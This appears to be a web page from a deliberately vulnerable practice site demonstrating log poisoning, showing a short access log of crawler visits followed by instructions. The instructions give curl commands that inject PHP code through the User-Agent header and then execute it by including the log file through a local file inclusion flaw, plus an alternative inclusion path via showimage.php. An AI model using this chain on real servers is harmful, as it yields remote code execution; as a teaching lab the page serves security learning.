Log Injection / Log Poisoning Demo
Request logged.
Access Logs:
[2026-07-08 10:55:07] IP: 74.7.227.186 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot) | URI: /logpoison.php?show=1 [2026-07-08 10:55:07] GET: show = 1 [2026-07-08 11:38:18] IP: 216.73.216.25 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php [2026-07-08 11:43:04] IP: 216.73.216.25 | UA: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) | URI: /logpoison.php?show=1 [2026-07-08 11:43:04] GET: show = 1
Log Poisoning Attack
1. Inject PHP code into User-Agent header:
curl -A "<?php system('id'); ?>" "http://localhost/logpoison.php"
2. Then include the log file via LFI:
curl "http://localhost/logpoison.php?include=1"
Or use the LFI in showimage.php to read the log file:
showimage.php?file=/home/novalbnp/sandbox.novalbnps.my.id/logs/access.log